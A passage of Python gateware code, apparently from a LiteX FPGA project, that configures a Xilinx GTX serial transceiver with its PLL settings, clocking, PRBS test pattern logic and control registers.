i_DRPCLK=self.drp.clk,
i_DRPDI=self.drp.di,
o_DRPDO=self.drp.do,
i_DRPEN=self.drp.en,
o_DRPRDY=self.drp.rdy,
i_DRPWE=self.drp.we,
)
@staticmethod
def compute_config(refclk_freq, linerate):
for n in 16, 20, 32, 40, 64, 66, 80, 100:
for m in 1, 2, 3, 4:
vco_freq = refclk_freq*n/m
if 5.93e9 <= vco_freq <= 8e9:
vco_band = "lower"
elif 9.8e9 <= vco_freq <= 12.5e9:
vco_band = "upper"
else:
vco_band = None
if vco_band is not None:
for d in [1, 2, 4, 8, 16]:
current_linerate = (vco_freq/2)*2/d
if current_linerate == linerate:
return {"n": n, "m": m, "d": d,
"vco_freq": vco_freq,
"vco_band": vco_band,
"clkin": refclk_freq,
"clkout": vco_freq/2,
"linerate": linerate}
msg = "No config found for {:3.2f} MHz refclk / {:3.2f} Gbps linerate."
raise ValueError(msg.format(refclk_freq/1e6, linerate/1e9))
def __repr__(self):
r = """
GTXQuadPLL
===========
overview:
---------
+-------------------------------------------------------------++
| +------------+ |
| +-----+ +---------------------------+ | Upper Band | +--+ |
| | | | Phase Frequency Detector +-> VCO | | | |
CLKIN +----> /M +--> Charge Pump | +------------+->/2+--> CLKOUT
| | | | Loop Filter +-> Lower Band | | | |
| +-----+ +---------------------------+ | VCO | +--+ |
| ^ +-----+------+ |
| | +-------+ | |
| +--------+ /N <----------------+ |
| +-------+ |
+--------------------------------------------------------------+
+-------+
CLKOUT +-> 2/D +-> LINERATE
+-------+
config:
-------
CLKIN = {clkin}MHz
CLKOUT = CLKIN x N / (2 x M) = {clkin}MHz x {n} / (2 x {m})
= {clkout}GHz
VCO = {vco_freq}GHz ({vco_band})
LINERATE = CLKOUT x 2 / D = {clkout}GHz x 2 / {d}
= {linerate}GHz
""".format(clkin=self.config["clkin"]/1e6,
n=self.config["n"],
m=self.config["m"],
clkout=self.config["clkout"]/1e9,
vco_freq=self.config["vco_freq"]/1e9,
vco_band=self.config["vco_band"],
d=self.config["d"],
linerate=self.config["linerate"]/1e9)
return r
class GTX(Module, AutoCSR):
def __init__(self, pll, tx_pads, rx_pads, sys_clk_freq, data_width=20,
tx_buffer_enable=False, rx_buffer_enable=False, clock_aligner=True,
tx_polarity=0, rx_polarity=0,
pll_master=True):
assert (data_width == 20) or (data_width == 40)
# TX controls
self.tx_restart = Signal()
self.tx_disable = Signal()
self.tx_produce_square_wave = Signal()
self.tx_prbs_config = Signal(2)
# RX controls
self.rx_ready = Signal()
self.rx_restart = Signal()
self.rx_prbs_config = Signal(2)
self.rx_prbs_errors = Signal(32)
# DRP
self.drp = DRPInterface()
# Loopback
self.loopback = Signal(3)
# # #
nwords = data_width//10
self.submodules.encoder = ClockDomainsRenamer("tx")(
Encoder(nwords, True))
self.decoders = [ClockDomainsRenamer("rx")(
Decoder(True)) for _ in range(nwords)]
self.submodules += self.decoders
# transceiver direct clock outputs
# useful to specify clock constraints in a way palatable to Vivado
self.txoutclk = Signal()
self.rxoutclk = Signal()
self.tx_clk_freq = pll.config["linerate"]/data_width
self.rx_clk_freq = pll.config["linerate"]/data_width
# control/status cdc
tx_produce_square_wave = Signal()
tx_prbs_config = Signal(2)
rx_prbs_config = Signal(2)
rx_prbs_errors = Signal(32)
self.specials += [
MultiReg(self.tx_produce_square_wave, tx_produce_square_wave, "tx"),
MultiReg(self.tx_prbs_config, tx_prbs_config, "tx"),
]
self.specials += [
MultiReg(self.rx_prbs_config, rx_prbs_config, "rx"),
MultiReg(rx_prbs_errors, self.rx_prbs_errors, "sys"), # FIXME
]
# # #
use_cpll = isinstance(pll, GTXChannelPLL)
use_qpll = isinstance(pll, GTXQuadPLL)
# TX generates TX clock, init must be in system domain
self.submodules.tx_init = tx_init = GTXTXInit(sys_clk_freq, buffer_enable=tx_buffer_enable)
self.comb += tx_init.restart.eq(self.tx_restart)
# RX receives restart commands from TX domain
self.submodules.rx_init = rx_init = ClockDomainsRenamer("tx")(
GTXRXInit(self.tx_clk_freq, buffer_enable=rx_buffer_enable))
self.comb += [
tx_init.plllock.eq(pll.lock),
rx_init.plllock.eq(pll.lock)
]
if pll_master:
self.comb += pll.reset.eq(tx_init.pllreset)
# DRP mux
self.submodules.drp_mux = drp_mux = DRPMux()
drp_mux.add_interface(self.drp)
rxcdr_cfgs = {
1 : 0x03000023ff10400020,
2 : 0x03000023ff10200020,
4 : 0x03000023ff10100020,
8 : 0x03000023ff10080020,
16 : 0x03000023ff10080020,
}
txdata = Signal(data_width)
rxdata = Signal(data_width)
self.gtx_params = dict(
# Simulation-Only Attributes
p_SIM_RECEIVER_DETECT_PASS ="TRUE",
p_SIM_TX_EIDLE_DRIVE_LEVEL ="X",
p_SIM_RESET_SPEEDUP ="FALSE",
p_SIM_CPLLREFCLK_SEL ="FALSE",
p_SIM_VERSION ="4.0",
# RX Byte and Word Alignment Attributes
p_ALIGN_COMMA_DOUBLE ="FALSE",
p_ALIGN_COMMA_ENABLE =0b1111111111,
p_ALIGN_COMMA_WORD =2 if data_width == 20 else 4,
p_ALIGN_MCOMMA_DET ="TRUE",
p_ALIGN_MCOMMA_VALUE =0b1010000011,
p_ALIGN_PCOMMA_DET ="TRUE",
p_ALIGN_PCOMMA_VALUE =0b0101111100,
p_SHOW_REALIGN_COMMA ="TRUE",
p_RXSLIDE_AUTO_WAIT =7,
p_RXSLIDE_MODE ="OFF" if rx_buffer_enable else "PCS",
p_RX_SIG_VALID_DLY =10,
# RX 8B/10B Decoder Attributes
p_RX_DISPERR_SEQ_MATCH ="TRUE",
p_DEC_MCOMMA_DETECT ="TRUE",
p_DEC_PCOMMA_DETECT ="TRUE",
p_DEC_VALID_COMMA_ONLY ="TRUE",
# RX Clock Correction Attributes
p_CBCC_DATA_SOURCE_SEL ="DECODED",
p_CLK_COR_SEQ_2_USE ="FALSE",
p_CLK_COR_KEEP_IDLE ="FALSE",
p_CLK_COR_MAX_LAT =9 if data_width == 20 else 20,
p_CLK_COR_MIN_LAT =7 if data_width == 20 else 16,
p_CLK_COR_PRECEDENCE ="TRUE",
p_CLK_COR_REPEAT_WAIT =0,
p_CLK_COR_SEQ_LEN =1,
p_CLK_COR_SEQ_1_ENABLE =0b1111,
p_CLK_COR_SEQ_1_1 =0b0100000000,
p_CLK_COR_SEQ_1_2 =0b0000000000,
p_CLK_COR_SEQ_1_3 =0b0000000000,
p_CLK_COR_SEQ_1_4 =0b0000000000,
p_CLK_CORRECT_USE ="FALSE",
p_CLK_COR_SEQ_2_ENABLE =0b1111,
p_CLK_COR_SEQ_2_1 =0b0100000000,
p_CLK_COR_SEQ_2_2 =0b0000000000,
p_CLK_COR_SEQ_2_3 =0b0000000000,
p_CLK_COR_SEQ_2_4 =0b0000000000,
# RX Channel Bonding Attributes
p_CHAN_BOND_KEEP_ALIGN ="FALSE",
p_CHAN_BOND_MAX_SKEW =1,
p_CHAN_BOND_SEQ_LEN =1,
p_CHAN_BOND_SEQ_1_1 =0b0000000000,
p_CHAN_BOND_SEQ_1_2 =0b0000000000,
p_CHAN_BOND_SEQ_1_3 =0b0000000000,
p_CHAN_BOND_SEQ_1_4 =0b0000000000,
p_CHAN_BOND_SEQ_1_ENABLE =0b1111,
p_CHAN_BOND_SEQ_2_1 =0b0000000000,
p_CHAN_BOND_SEQ_2_2 =0b0000000000,
p_CHAN_BOND_SEQ_2_3 =0b0000000000,
p_CHAN_BOND_SEQ_2_4 =0b0000000000,
p_CHAN_BOND_SEQ_2_ENABLE =0b1111,
p_CHAN_BOND_SEQ_2_USE ="FALSE",
p_FTS_DESKEW_SEQ_ENABLE =0b1111,
p_FTS_LANE_DESKEW_CFG =0b1111,
p_FTS_LANE_DESKEW_EN ="FALSE",
# RX Margin Analysis Attributes
p_ES_CONTROL =0b000000,
p_ES_ERRDET_EN ="FALSE",
p_ES_EYE_SCAN_EN ="TRUE",
p_ES_HORZ_OFFSET =0x000,
p_ES_PMA_CFG =0b0000000000,
p_ES_PRESCALE =0b00000,
p_ES_QUALIFIER =0x00000000000000000000,
p_ES_QUAL_MASK =0x00000000000000000000,
p_ES_SDATA_MASK =0x00000000000000000000,
p_ES_VERT_OFFSET =0b000000000,
# FPGA RX Interface Attributes
p_RX_DATA_WIDTH =data_width,
# PMA Attributes
p_OUTREFCLK_SEL_INV =0b11,
p_PMA_RSV =0x001e7080,
p_PMA_RSV2 =0x2050,
p_PMA_RSV3 =0b00,
p_PMA_RSV4 =0x00000000,
p_RX_BIAS_CFG =0b000000000100,
p_DMONITOR_CFG =0x000A00,
p_RX_CM_SEL =0b11,
p_RX_CM_TRIM =0b010,
p_RX_DEBUG_CFG =0b000000000000,
p_RX_OS_CFG =0b0000010000000,
p_TERM_RCAL_CFG =0b10000,
p_TERM_RCAL_OVRD =0b0,
p_TST_RSV =0x00000000,
p_RX_CLK25_DIV =5,
p_TX_CLK25_DIV =5,
p_UCODEER_CLR =0b0,
# PCI Express Attributes
p_PCS_PCIE_EN ="FALSE",
# PCS Attributes
p_PCS_RSVD_ATTR =0x000000000000,
# RX Buffer Attributes
p_RXBUF_ADDR_MODE ="FAST",
p_RXBUF_EIDLE_HI_CNT =0b1000,
p_RXBUF_EIDLE_LO_CNT =0b0000,
p_RXBUF_EN ="TRUE" if rx_buffer_enable else "FALSE",
p_RX_BUFFER_CFG =0b000000,
p_RXBUF_RESET_ON_CB_CHANGE ="TRUE",
p_RXBUF_RESET_ON_COMMAALIGN ="FALSE",
p_RXBUF_RESET_ON_EIDLE ="FALSE",
p_RXBUF_RESET_ON_RATE_CHANGE ="TRUE",
p_RXBUFRESET_TIME =0b00001,
p_RXBUF_THRESH_OVFLW =61,
p_RXBUF_THRESH_OVRD ="FALSE",
p_RXBUF_THRESH_UNDFLW =4,
p_RXDLY_CFG =0x001F,
p_RXDLY_LCFG =0x030,
p_RXDLY_TAP_CFG =0x0000,
p_RXPH_CFG =0x000000,
p_RXPHDLY_CFG =0x084020,
p_RXPH_MONITOR_SEL =0b00000,
p_RX_XCLK_SEL ="RXREC" if rx_buffer_enable else "RXUSR",
p_RX_DDI_SEL =0b000000,
p_RX_DEFER_RESET_BUF_EN ="TRUE",
# CDR Attributes
p_RXCDR_CFG =rxcdr_cfgs[pll.config["d"]],
p_RXCDR_FR_RESET_ON_EIDLE =0b0,
p_RXCDR_HOLD_DURING_EIDLE =0b0,
p_RXCDR_PH_RESET_ON_EIDLE =0b0,
p_RXCDR_LOCK_CFG =0b010101,
# RX Initialization and Reset Attributes
p_RXCDRFREQRESET_TIME =0b00001,
p_RXCDRPHRESET_TIME =0b00001,
p_RXISCANRESET_TIME =0b00001,
p_RXPCSRESET_TIME =0b00001,
p_RXPMARESET_TIME =0b00011,
# RX OOB Signaling Attributes
p_RXOOB_CFG =0b0000110,
# RX Gearbox Attributes
p_RXGEARBOX_EN ="FALSE",
p_GEARBOX_MODE =0b000,
# PRBS Detection Attribute
p_RXPRBS_ERR_LOOPBACK =0b0,
# Power-Down Attributes
p_PD_TRANS_TIME_FROM_P2 =0x03c,
p_PD_TRANS_TIME_NONE_P2 =0x3c,
p_PD_TRANS_TIME_TO_P2 =0x64,
# RX OOB Signaling Attributes
p_SAS_MAX_COM =64,
p_SAS_MIN_COM =36,
p_SATA_BURST_SEQ_LEN =0b0101,
p_SATA_BURST_VAL =0b100,
p_SATA_EIDLE_VAL =0b100,
p_SATA_MAX_BURST =8,
p_SATA_MAX_INIT =21,
p_SATA_MAX_WAKE =7,
p_SATA_MIN_BURST =4,
p_SATA_MIN_INIT =12,
p_SATA_MIN_WAKE =4,
# RX Fabric Clock Output Control Attributes
p_TRANS_TIME_RATE =0x0E,
# TX Buffer Attributes
p_TXBUF_EN ="TRUE" if tx_buffer_enable else "FALSE",
p_TXBUF_RESET_ON_RATE_CHANGE ="TRUE",
p_TXDLY_CFG =0x001F,
p_TXDLY_LCFG =0x030,
p_TXDLY_TAP_CFG =0x0000,
p_TXPH_CFG =0x0780,
p_TXPHDLY_CFG =0x084020,
p_TXPH_MONITOR_SEL =0b00000,
p_TX_XCLK_SEL ="TXOUT" if tx_buffer_enable else "TXUSR",
# FPGA TX Interface Attributes
p_TX_DATA_WIDTH =data_width,
# TX Configurable Driver Attributes
p_TX_DEEMPH0 =0b00000,
p_TX_DEEMPH1 =0b00000,
p_TX_EIDLE_ASSERT_DELAY =0b110,
p_TX_EIDLE_DEASSERT_DELAY =0b100,
p_TX_LOOPBACK_DRIVE_HIZ ="FALSE",
p_TX_MAINCURSOR_SEL =0b0,
p_TX_DRIVE_MODE ="DIRECT",
p_TX_MARGIN_FULL_0 =0b1001110,
p_TX_MARGIN_FULL_1 =0b1001001,
p_TX_MARGIN_FULL_2 =0b1000101,
p_TX_MARGIN_FULL_3 =0b1000010,
p_TX_MARGIN_FULL_4 =0b1000000,
p_TX_MARGIN_LOW_0 =0b1000110,
p_TX_MARGIN_LOW_1 =0b1000100,
p_TX_MARGIN_LOW_2 =0b1000010,
p_TX_MARGIN_LOW_3 =0b1000000,
p_TX_MARGIN_LOW_4 =0b1000000,
# TX Gearbox Attributes
p_TXGEARBOX_EN ="FALSE",
# TX Initialization and Reset Attributes
p_TXPCSRESET_TIME =0b00001,
p_TXPMARESET_TIME =0b00001,
# TX Receiver Detection Attributes
p_TX_RXDETECT_CFG =0x1832,
p_TX_RXDETECT_REF =0b100,
# CPLL Attributes
p_CPLL_CFG =0xBC07DC,
p_CPLL_FBDIV =1 if use_qpll else pll.config["n2"],
p_CPLL_FBDIV_45 =4 if use_qpll else pll.config["n1"],
p_CPLL_INIT_CFG =0x00001E,
p_CPLL_LOCK_CFG =0x01E8,
p_CPLL_REFCLK_DIV =1 if use_qpll else pll.config["m"],
p_RXOUT_DIV =pll.config["d"],
p_TXOUT_DIV =pll.config["d"],
p_SATA_CPLL_CFG ="VCO_3000MHZ",
# RX Initialization and Reset Attributes
p_RXDFELPMRESET_TIME =0b0001111,
# RX Equalizer Attributes
p_RXLPM_HF_CFG =0b00000011110000,
p_RXLPM_LF_CFG =0b00000011110000,
p_RX_DFE_GAIN_CFG =0x020FEA,
p_RX_DFE_H2_CFG =0b000000000000,
p_RX_DFE_H3_CFG =0b000001000000,
p_RX_DFE_H4_CFG =0b00011110000,
p_RX_DFE_H5_CFG =0b00011100000,
p_RX_DFE_KL_CFG =0b0000011111110,
p_RX_DFE_LPM_CFG =0x0954,
p_RX_DFE_LPM_HOLD_DURING_EIDLE =0b0,
p_RX_DFE_UT_CFG =0b10001111000000000,
p_RX_DFE_VP_CFG =0b00011111100000011,
# Power-Down Attributes
p_RX_CLKMUX_PD =0b1,
p_TX_CLKMUX_PD =0b1,
# FPGA RX Interface Attribute
p_RX_INT_DATAWIDTH =data_width == 40,
# FPGA TX Interface Attribute
p_TX_INT_DATAWIDTH =data_width == 40,
# TX Configurable Driver Attributes
p_TX_QPI_STATUS_EN =0b0,
# RX Equalizer Attributes
p_RX_DFE_KL_CFG2 =0x301148AC,
p_RX_DFE_XYD_CFG =0b0000000000000,
# TX Configurable Driver Attributes
p_TX_PREDRIVER_MODE =0b0
)
self.gtx_params.update(
# CPLL Ports
#o_CPLLFBCLKLOST =,
o_CPLLLOCK =Signal() if use_qpll else pll.lock,
i_CPLLLOCKDETCLK =ClockSignal(),
i_CPLLLOCKEN =1,
i_CPLLPD =0,
#o_CPLLREFCLKLOST =,
i_CPLLREFCLKSEL =0b001,
i_CPLLRESET =0 if use_qpll else pll.reset,
i_GTRSVD =0b0000000000000000,
i_PCSRSVDIN =0b0000000000000000,
i_PCSRSVDIN2 =0b00000,
i_PMARSVDIN =0b00000,
i_PMARSVDIN2 =0b00000,
i_TSTIN =0b11111111111111111111,
#o_TSTOUT =,
# Channel
i_CLKRSVD =0b0000,
# Channel - Clocking Ports
i_GTGREFCLK =0,
i_GTNORTHREFCLK0 =0,
i_GTNORTHREFCLK1 =0,
i_GTREFCLK0 =0 if use_qpll else pll.refclk,
i_GTREFCLK1 =0,
i_GTSOUTHREFCLK0 =0,
i_GTSOUTHREFCLK1 =0,
# Channel - DRP Ports
i_DRPADDR =drp_mux.addr,
i_DRPCLK =drp_mux.clk,
i_DRPDI =drp_mux.di,
o_DRPDO =drp_mux.do,
i_DRPEN =drp_mux.en,
o_DRPRDY =drp_mux.rdy,
i_DRPWE =drp_mux.we,
# Clocking Ports
#o_GTREFCLKMONITOR =,
i_QPLLCLK =0 if use_cpll else pll.clk,
i_QPLLREFCLK =0 if use_cpll else pll.refclk,
i_RXSYSCLKSEL =0b11 if use_qpll else 0b00,
i_TXSYSCLKSEL =0b11 if use_qpll else 0b00,
# Digital Monitor Ports
#o_DMONITOROUT =,
# FPGA TX Interface Datapath Configuration
i_TX8B10BEN =0,
# Loopback Ports
i_LOOPBACK =self.loopback,
# PCI Express Ports
#o_PHYSTATUS =,
i_RXRATE =0b000,
#o_RXVALID =,
# Power-Down Ports
i_RXPD =Cat(rx_init.gtXxpd, rx_init.gtXxpd),
i_TXPD =0b00,
# RX 8B/10B Decoder Ports
i_SETERRSTATUS =0,
# RX Initialization and Reset Ports
i_EYESCANRESET =0,
i_RXUSERRDY =rx_init.Xxuserrdy,
# RX Margin Analysis Ports
#o_EYESCANDATAERROR =,
i_EYESCANMODE =0,
i_EYESCANTRIGGER =0,
# Receive Ports - CDR Ports
i_RXCDRFREQRESET =0,
i_RXCDRHOLD =0,
#o_RXCDRLOCK =,
i_RXCDROVRDEN =0,
i_RXCDRRESET =0,
i_RXCDRRESETRSV =0,
# Receive Ports - Clock Correction Ports
#o_RXCLKCORCNT =,
# Receive Ports - FPGA RX Interface Datapath Configuration
i_RX8B10BEN =0,
# Receive Ports - FPGA RX Interface Ports
i_RXUSRCLK =ClockSignal("rx"),
i_RXUSRCLK2 =ClockSignal("rx"),
# Receive Ports - FPGA RX interface Ports
o_RXDATA =Cat(*[rxdata[10*i:10*i+8] for i in range(nwords)]),
# Receive Ports - Pattern Checker Ports
#o_RXPRBSERR =,
i_RXPRBSSEL =0b000,
# Receive Ports - Pattern Checker ports
i_RXPRBSCNTRESET =0,
# Receive Ports - RX Equalizer Ports
i_RXDFEXYDEN =1,
i_RXDFEXYDHOLD =0,
i_RXDFEXYDOVRDEN =0,
# Receive Ports - RX 8B/10B Decoder Ports
i_RXDISPERR =Cat(*[rxdata[10*i+9] for i in range(nwords)]),
#o_RXNOTINTABLE =,
# Receive Ports - RX AFE
i_GTXRXP =rx_pads.p,
i_GTXRXN =rx_pads.n,
# Receive Ports - RX Buffer Bypass Ports
i_RXBUFRESET =0,
#o_RXBUFSTATUS =,
i_RXDDIEN =0 if rx_buffer_enable else 1,
i_RXDLYBYPASS =1 if rx_buffer_enable else 0,
i_RXDLYEN =0,
i_RXDLYOVRDEN =0,
i_RXDLYSRESET =rx_init.Xxdlysreset,
o_RXDLYSRESETDONE =rx_init.Xxdlysresetdone,
i_RXPHALIGN =0,
o_RXPHALIGNDONE =rx_init.Xxphaligndone,
i_RXPHALIGNEN =0,
i_RXPHDLYPD =0,
i_RXPHDLYRESET =0,
#o_RXPHMONITOR =,
i_RXPHOVRDEN =0,
#o_RXPHSLIPMONITOR =,
#o_RXSTATUS =,
# Receive Ports - RX Byte and Word Alignment Ports
#o_RXBYTEISALIGNED =,
#o_RXBYTEREALIGN =,
#o_RXCOMMADET =,
i_RXCOMMADETEN =1,
i_RXMCOMMAALIGNEN =(rx_prbs_config == 0b00) if rx_buffer_enable else 0,
i_RXPCOMMAALIGNEN =(rx_prbs_config == 0b00) if rx_buffer_enable else 0,
# Receive Ports - RX Channel Bonding Ports
#o_RXCHANBONDSEQ =,
i_RXCHBONDEN =0,
i_RXCHBONDLEVEL =0b000,
i_RXCHBONDMASTER =0,
#o_RXCHBONDO =,
i_RXCHBONDSLAVE =0,
# Receive Ports - RX Channel Bonding Ports
#o_RXCHANISALIGNED =,
#o_RXCHANREALIGN =,
# Receive Ports - RX Equailizer Ports
i_RXLPMHFHOLD =0,
i_RXLPMHFOVRDEN =0,
i_RXLPMLFHOLD =0,
# Receive Ports - RX Equalizer Ports
i_RXDFEAGCHOLD =0,
i_RXDFEAGCOVRDEN =0,
i_RXDFECM1EN =0,
i_RXDFELFHOLD =0,
i_RXDFELFOVRDEN =1,
i_RXDFELPMRESET =0,
i_RXDFETAP2HOLD =0,
i_RXDFETAP2OVRDEN =0,
i_RXDFETAP3HOLD =0,
i_RXDFETAP3OVRDEN =0,
i_RXDFETAP4HOLD =0,
i_RXDFETAP4OVRDEN =0,
i_RXDFETAP5HOLD =0,
i_RXDFETAP5OVRDEN =0,
i_RXDFEUTHOLD =0,
i_RXDFEUTOVRDEN =0,
i_RXDFEVPHOLD =0,
i_RXDFEVPOVRDEN =0,
i_RXDFEVSEN =0,
i_RXLPMLFKLOVRDEN =0,
#o_RXMONITOROUT =
i_RXMONITORSEL =0,
i_RXOSHOLD =0,
i_RXOSOVRDEN =0,
# Receive Ports - RX Fabric ClocK Output Control Ports
#o_RXRATEDONE =,
# Receive Ports - RX Fabric Output Control Ports
o_RXOUTCLK =self.rxoutclk,
#o_RXOUTCLKFABRIC =,
#o_RXOUTCLKPCS =,
i_RXOUTCLKSEL =0b010,
# Receive Ports - RX Gearbox Ports
#o_RXDATAVALID =,
#o_RXHEADER =,
#o_RXHEADERVALID =,
#o_RXSTARTOFSEQ =,
# Receive Ports - RX Gearbox Ports
i_RXGEARBOXSLIP =0,
# Receive Ports - RX Initialization and Reset Ports
i_GTRXRESET =rx_init.gtXxreset,
i_RXOOBRESET =0,
i_RXPCSRESET =0,
i_RXPMARESET =0,
# Receive Ports - RX Margin Analysis ports
i_RXLPMEN =0,
# Receive Ports - RX OOB Signaling ports
#o_RXCOMSASDET =,
#o_RXCOMWAKEDET =,
# Receive Ports - RX OOB Signaling ports
#o_RXCOMINITDET =,
# Receive Ports - RX OOB signalling Ports
#o_RXELECIDLE =,
i_RXELECIDLEMODE =0b11,
# Receive Ports - RX Polarity Control Ports
i_RXPOLARITY =rx_polarity,
# Receive Ports - RX gearbox ports
i_RXSLIDE =0,
# Receive Ports - RX8B/10B Decoder Ports
#o_RXCHARISCOMMA =,
o_RXCHARISK =Cat(*[rxdata[10*i+8] for i in range(nwords)]),
# Receive Ports - Rx Channel Bonding Ports
i_RXCHBONDI =0b00000,
# Receive Ports -RX Initialization and Reset Ports
o_RXRESETDONE =rx_init.Xxresetdone,
# Rx AFE Ports
i_RXQPIEN =0,
#o_RXQPISENN =,
#o_RXQPISENP =,
# TX Buffer Bypass Ports
i_TXPHDLYTSTCLK =0,
# TX Configurable Driver Ports
i_TXPOSTCURSOR =0b00000,
i_TXPOSTCURSORINV =0,
i_TXPRECURSOR =0b00000,
i_TXPRECURSORINV =0,
i_TXQPIBIASEN =0,
i_TXQPISTRONGPDOWN =0,
i_TXQPIWEAKPUP =0,
# TX Initialization and Reset Ports
i_CFGRESET =0,
i_GTTXRESET =tx_init.gtXxreset,
#o_PCSRSVDOUT =,
i_TXUSERRDY =tx_init.Xxuserrdy,
# Transceiver Reset Mode Operation
i_GTRESETSEL =0,
i_RESETOVRD =0,
# Transmit Ports - 8b10b Encoder Control Ports
i_TXCHARDISPMODE =Cat(*[txdata[10*i+9] for i in range(nwords)]),
i_TXCHARDISPVAL =Cat(*[txdata[10*i+8] for i in range(nwords)]),
# Transmit Ports - FPGA TX Interface Ports
i_TXUSRCLK =ClockSignal("tx"),
i_TXUSRCLK2 =ClockSignal("tx"),
# Transmit Ports - PCI Express Ports
i_TXELECIDLE =0,
i_TXMARGIN =0b000,
i_TXRATE =0b000,
i_TXSWING =0,
# Transmit Ports - Pattern Generator Ports
i_TXPRBSFORCEERR =0,
# Transmit Ports - TX Buffer Bypass Ports
i_TXDLYBYPASS =1 if tx_buffer_enable else 0,
i_TXDLYEN =0,
i_TXDLYHOLD =0,
i_TXDLYOVRDEN =0,
i_TXDLYSRESET =tx_init.Xxdlysreset,
o_TXDLYSRESETDONE =tx_init.Xxdlysresetdone,
i_TXDLYUPDOWN =0,
i_TXPHALIGN =0,
o_TXPHALIGNDONE =tx_init.Xxphaligndone,
i_TXPHALIGNEN =0,
i_TXPHDLYPD =0,
i_TXPHDLYRESET =0,
i_TXPHINIT =0,
#o_TXPHINITDONE =,
i_TXPHOVRDEN =0,
# Transmit Ports - TX Buffer Ports
#o_TXBUFSTATUS =,
# Transmit Ports - TX Configurable Driver Ports
i_TXBUFDIFFCTRL =0b100,
i_TXDEEMPH =0,
i_TXDIFFCTRL =0b1000,
i_TXDIFFPD =0,
i_TXINHIBIT =self.tx_disable,
i_TXMAINCURSOR =0b0000000,
i_TXPISOPD =0,
# Transmit Ports - TX Data Path interface
i_TXDATA =Cat(*[txdata[10*i:10*i+8] for i in range(nwords)]),
# Transmit Ports - TX Driver and OOB signaling
o_GTXTXN =tx_pads.n,
o_GTXTXP =tx_pads.p,
# Transmit Ports - TX Fabric Clock Output Control Ports
o_TXOUTCLK =self.txoutclk,
#o_TXOUTCLKFABRIC =,
#o_TXOUTCLKPCS =,
i_TXOUTCLKSEL =0b010 if tx_buffer_enable else 0b011,
#o_TXRATEDONE =,
# Transmit Ports - TX Gearbox Ports
i_TXCHARISK =0b00000000,
#o_TXGEARBOXREADY =,
i_TXHEADER =0b000,
i_TXSEQUENCE =0b0000000,
i_TXSTARTSEQ =0,
# Transmit Ports - TX Initialization and Reset Ports
i_TXPCSRESET =0,
i_TXPMARESET =0,
o_TXRESETDONE =tx_init.Xxresetdone,
# Transmit Ports - TX OOB signaling Ports
#o_TXCOMFINISH =,
i_TXCOMINIT =0,
i_TXCOMSAS =0,
i_TXCOMWAKE =0,
i_TXPDELECIDLEMODE =0,
# Transmit Ports - TX Polarity Control Ports
i_TXPOLARITY =tx_polarity,
# Transmit Ports - TX Receiver Detection Ports
i_TXDETECTRX =0,
# Transmit Ports - TX8b/10b Encoder Ports
i_TX8B10BBYPASS =0b00000000,
# Transmit Ports - pattern Generator Ports
i_TXPRBSSEL =0b000,
# Tx Configurable Driver Ports
#o_TXQPISENN =,
#o_TXQPISENP =,
)
# tx clocking
tx_reset_deglitched = Signal()
tx_reset_deglitched.attr.add("no_retiming")
self.sync += tx_reset_deglitched.eq(~tx_init.done)
self.clock_domains.cd_tx = ClockDomain()
txoutclk_bufg = Signal()
self.specials += Instance("BUFG", i_I=self.txoutclk, o_O=txoutclk_bufg)
if not tx_buffer_enable:
txoutclk_div = pll.config["clkin"]/self.tx_clk_freq
else:
txoutclk_div = 1
# Use txoutclk_bufg when divider is 1
if txoutclk_div == 1:
self.comb += self.cd_tx.clk.eq(txoutclk_bufg)
self.specials += AsyncResetSynchronizer(self.cd_tx, tx_reset_deglitched)
# Use a BUFR when integer divider (with BUFR_DIVIDE)
elif txoutclk_div == int(txoutclk_div):
txoutclk_bufr = Signal()
self.specials += [
Instance("BUFR", i_I=txoutclk_bufg, o_O=txoutclk_bufr,
i_CE=1, p_BUFR_DIVIDE=str(int(txoutclk_div))),
Instance("BUFG", i_I=txoutclk_bufr, o_O=self.cd_tx.clk),
AsyncResetSynchronizer(self.cd_tx, tx_reset_deglitched)
]
# Use a PLL when non-integer divider
else:
txoutclk_pll = S7PLL()
self.comb += txoutclk_pll.reset.eq(tx_reset_deglitched)
self.submodules += txoutclk_pll
txoutclk_pll.register_clkin(txoutclk_bufg, pll.config["clkin"])
txoutclk_pll.create_clkout(self.cd_tx, self.tx_clk_freq)
# rx clocking
rx_reset_deglitched = Signal()
rx_reset_deglitched.attr.add("no_retiming")
self.sync.tx += rx_reset_deglitched.eq(~rx_init.done)
self.clock_domains.cd_rx = ClockDomain()
self.specials += [
Instance("BUFG", i_I=self.rxoutclk, o_O=self.cd_rx.clk),
AsyncResetSynchronizer(self.cd_rx, rx_reset_deglitched)
]
# tx data and prbs
self.submodules.tx_prbs = ClockDomainsRenamer("tx")(PRBSTX(data_width, True))
self.comb += self.tx_prbs.config.eq(tx_prbs_config)
self.comb += [
self.tx_prbs.i.eq(Cat(*[self.encoder.output[i] for i in range(nwords)])),
If(tx_produce_square_wave,
# square wave @ linerate/data_width for scope observation
txdata.eq(Signal(data_width, reset=1<<(data_width//2)-1))
).Else(
txdata.eq(self.tx_prbs.o)
)
]
# rx data and prbs
self.submodules.rx_prbs = ClockDomainsRenamer("rx")(PRBSRX(data_width, True))
self.comb += [
self.rx_prbs.config.eq(rx_prbs_config),
rx_prbs_errors.eq(self.rx_prbs.errors)
]
for i in range(nwords):
self.comb += self.decoders[i].input.eq(rxdata[10*i:10*(i+1)])
self.comb += self.rx_prbs.i.eq(rxdata)
# clock alignment
if clock_aligner:
clock_aligner = BruteforceClockAligner(0b0101111100, self.tx_clk_freq)
self.submodules.clock_aligner = clock_aligner
self.comb += [
clock_aligner.rxdata.eq(rxdata),
rx_init.restart.eq(clock_aligner.restart | self.rx_restart),
self.rx_ready.eq(clock_aligner.ready)
]
else:
self.comb += self.rx_ready.eq(rx_init.done)
def add_base_control(self):
if hasattr(self, "clock_aligner"):
self._clock_aligner_disable = CSRStorage()
self._tx_restart = CSR()
self._tx_disable = CSRStorage(reset=0b0)
self._tx_produce_square_wave = CSRStorage(reset=0b0)
self._rx_ready = CSRStatus()
self._rx_restart = CSR()
if hasattr(self, "clock_aligner"):
self.comb += self.clock_aligner.disable.eq(self._clock_aligner_disable.storage)
self.comb += [
self.tx_restart.eq(self._tx_restart.re),
self.tx_disable.eq(self._tx_disable.storage),
self.tx_produce_square_wave.eq(self._tx_produce_square_wave.storage),
self._rx_ready.status.eq(self.rx_ready),
self.rx_restart.eq(self._rx_restart.re)
]
def add_prbs_control(self):
self._tx_prbs_config = CSRStorage(2, reset=0b00)
self._rx_prbs_config = CSRStorage(2, reset=0b00)
self._rx_prbs_errors = CSRStatus(32)
self.comb += [
